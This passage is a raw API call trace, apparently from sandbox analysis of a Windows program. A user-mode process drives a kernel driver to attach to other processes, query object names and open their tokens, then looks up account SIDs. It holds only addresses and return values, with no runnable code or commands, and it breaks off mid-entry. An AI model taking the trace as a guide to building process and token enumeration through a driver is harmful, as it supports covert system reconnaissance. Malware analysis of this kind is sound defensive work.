Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.861] PsAcquireProcessExitSynchronization () returned 0x0 [0245.861] KeStackAttachProcess (in: PROCESS=0xfffffa800203a060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800203a060, ApcState=0xfffff880053c85d0) [0245.861] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800203c270, HandleInformation=0x0) returned 0x0 [0245.861] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.861] PsReleaseProcessExitSynchronization () returned 0x2 [0245.861] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x12 [0245.861] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.861] ObfDereferenceObject (Object=0xfffffa800203c270) returned 0x1 [0245.861] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.861] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.861] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.861] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.861] PsLookupProcessByProcessId (in: ProcessId=0x1c0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.861] PsAcquireProcessExitSynchronization () returned 0x0 [0245.861] KeStackAttachProcess (in: PROCESS=0xfffffa800203a060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800203a060, ApcState=0xfffff880053c85d0) [0245.861] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.861] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.861] PsReleaseProcessExitSynchronization () returned 0x2 [0245.861] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x12 [0245.861] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.861] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.861] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.861] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7c8) returned 0xc8 [0245.862] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.862] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002059b30, HandleInformation=0x0) returned 0x0 [0245.862] ObOpenObjectByPointer (in: Object=0xfffffa8002059b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.862] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x14 [0245.862] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.862] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.862] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.862] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.862] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.864] CloseHandle (hObject=0xc4) returned 1 [0245.864] CloseHandle (hObject=0xc8) returned 1 [0245.864] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.864] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.864] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.864] PsAcquireProcessExitSynchronization () returned 0x0 [0245.864] KeStackAttachProcess (in: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880053c85d0) [0245.864] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002056690, HandleInformation=0x0) returned 0x0 [0245.864] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.864] PsReleaseProcessExitSynchronization () returned 0x2 [0245.864] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x12 [0245.864] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.864] ObfDereferenceObject (Object=0xfffffa8002056690) returned 0x1 [0245.864] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.864] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.864] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.864] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0245.865] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.865] PsAcquireProcessExitSynchronization () returned 0x0 [0245.865] KeStackAttachProcess (in: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880053c85d0) [0245.865] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800205f070, HandleInformation=0x0) returned 0x0 [0245.865] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.865] PsReleaseProcessExitSynchronization () returned 0x2 [0245.865] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x12 [0245.865] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.865] ObfDereferenceObject (Object=0xfffffa800205f070) returned 0x1 [0245.865] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.865] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.865] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.865] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.865] PsLookupProcessByProcessId (in: ProcessId=0x7c8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.865] PsAcquireProcessExitSynchronization () returned 0x0 [0245.865] KeStackAttachProcess (in: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002059b30, ApcState=0xfffff880053c85d0) [0245.865] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.865] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.865] PsReleaseProcessExitSynchronization () returned 0x2 [0245.865] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x12 [0245.865] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.865] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.865] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.865] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x788) returned 0xc8 [0245.866] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.866] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800205f1d0, HandleInformation=0x0) returned 0x0 [0245.866] ObOpenObjectByPointer (in: Object=0xfffffa800205f1d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.866] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x14 [0245.866] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.866] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.866] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.866] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.866] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.868] CloseHandle (hObject=0xc4) returned 1 [0245.868] CloseHandle (hObject=0xc8) returned 1 [0245.868] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.868] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.868] PsLookupProcessByProcessId (in: ProcessId=0x788, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.868] PsAcquireProcessExitSynchronization () returned 0x0 [0245.868] KeStackAttachProcess (in: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880053c85d0) [0245.868] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020648d0, HandleInformation=0x0) returned 0x0 [0245.868] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.868] PsReleaseProcessExitSynchronization () returned 0x2 [0245.868] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x12 [0245.868] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.868] ObfDereferenceObject (Object=0xfffffa80020648d0) returned 0x1 [0245.868] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.868] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.868] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.868] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0245.868] PsLookupProcessByProcessId (in: ProcessId=0x788, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.868] PsAcquireProcessExitSynchronization () returned 0x0 [0245.868] KeStackAttachProcess (in: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880053c85d0) [0245.869] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002064a20, HandleInformation=0x0) returned 0x0 [0245.869] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.869] PsReleaseProcessExitSynchronization () returned 0x2 [0245.869] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x12 [0245.869] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.869] ObfDereferenceObject (Object=0xfffffa8002064a20) returned 0x1 [0245.869] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.869] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.869] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.869] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.869] PsLookupProcessByProcessId (in: ProcessId=0x788, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.869] PsAcquireProcessExitSynchronization () returned 0x0 [0245.869] KeStackAttachProcess (in: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800205f1d0, ApcState=0xfffff880053c85d0) [0245.869] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.869] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.869] PsReleaseProcessExitSynchronization () returned 0x2 [0245.869] ObfDereferenceObject (Object=0xfffffa800205f1d0) returned 0x12 [0245.869] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.869] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.869] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.870] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x484) returned 0xc8 [0245.870] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.870] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800206e920, HandleInformation=0x0) returned 0x0 [0245.870] ObOpenObjectByPointer (in: Object=0xfffffa800206e920, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.870] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x14 [0245.870] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.870] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.870] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.870] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.870] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.872] CloseHandle (hObject=0xc4) returned 1 [0245.872] CloseHandle (hObject=0xc8) returned 1 [0245.872] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.872] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.872] PsLookupProcessByProcessId (in: ProcessId=0x484, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.872] PsAcquireProcessExitSynchronization () returned 0x0 [0245.872] KeStackAttachProcess (in: PROCESS=0xfffffa800206e920, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800206e920, ApcState=0xfffff880053c85d0) [0245.872] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800206dcb0, HandleInformation=0x0) returned 0x0 [0245.872] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.872] PsReleaseProcessExitSynchronization () returned 0x2 [0245.872] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x12 [0245.872] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.872] ObfDereferenceObject (Object=0xfffffa800206dcb0) returned 0x1 [0245.872] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.872] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.872] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.872] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0245.872] PsLookupProcessByProcessId (in: ProcessId=0x484, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.872] PsAcquireProcessExitSynchronization () returned 0x0 [0245.873] KeStackAttachProcess (in: PROCESS=0xfffffa800206e920, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800206e920, ApcState=0xfffff880053c85d0) [0245.873] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800206d8c0, HandleInformation=0x0) returned 0x0 [0245.873] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.873] PsReleaseProcessExitSynchronization () returned 0x2 [0245.873] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x12 [0245.873] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.873] ObfDereferenceObject (Object=0xfffffa800206d8c0) returned 0x1 [0245.873] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.873] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.873] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.873] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.873] PsLookupProcessByProcessId (in: ProcessId=0x484, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.873] PsAcquireProcessExitSynchronization () returned 0x0 [0245.873] KeStackAttachProcess (in: PROCESS=0xfffffa800206e920, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800206e920, ApcState=0xfffff880053c85d0) [0245.873] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.873] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.873] PsReleaseProcessExitSynchronization () returned 0x2 [0245.873] ObfDereferenceObject (Object=0xfffffa800206e920) returned 0x12 [0245.873] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.873] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.873] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.873] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.873] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x138) returned 0xc8 [0245.873] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.873] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f23b30, HandleInformation=0x0) returned 0x0 [0245.874] ObOpenObjectByPointer (in: Object=0xfffffa8001f23b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.874] ObfDereferenceObject (Object=0xfffffa8001f23b30) returned 0x14 [0245.874] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 